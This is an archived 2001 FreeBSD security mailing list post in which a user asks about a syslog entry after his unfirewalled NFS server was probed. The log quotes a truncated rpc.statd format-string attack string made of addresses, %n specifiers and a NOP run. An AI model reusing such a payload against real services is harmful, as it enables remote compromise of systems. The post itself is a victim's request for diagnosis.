Skip site navigation (1)Skip section navigation (2) 
Date:      Mon, 4 Jun 2001 01:30:42 -0500 (CDT)
From:      Josh Thomas <jdt2101@ksu.edu>
To:        freebsd-security@freebsd.org
Subject:   rpc.statd attack before ipfw activated
Message-ID:  <Pine.GSO.4.21L.0106040126530.3155-100000@unix1.cc.ksu.edu>
In-Reply-To: <3B1A92C6.8030301@bsd.st>
next in thread | previous in thread | raw e-mail | index | archive | help 
I didn't set up ipfw for a couple of days in between setting up a small
nfs server for an in-home lan, and I got this in my system log.  I realize
that I should have set up ipfw before doing this now, but any ideas what
just happened?  Here is the log:
Jun  2 19:36:41 thatguys rpc.statd: invalid hostname to
sm_stat: ^X\xf7\xff\xbf^
X\xf7\xff\xbf^Y\xf7\xff\xbf^Y\xf7\xff\xbf^Z\xf7\xff\xbf^Z\xf7\xff\xbf^[\xf7\xff\
xbf^[\xf7\xff\xbf%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%nM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P
Jun  2 19:36:41 thatguys /kernel: PM-^PM-^PM-^P

And it cut off there.  This is a home machine, and yes, I realize that a
firewall should have been running first, however, I didn't have time.  I'm
a relative novice to rpc and nfs in general, so any clues would be
appreciated.  Thanks,

Josh Thomas
Student Systems Analyst
Engineering Computing Center
Kansas State University



To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.GSO.4.21L.0106040126530.3155-100000>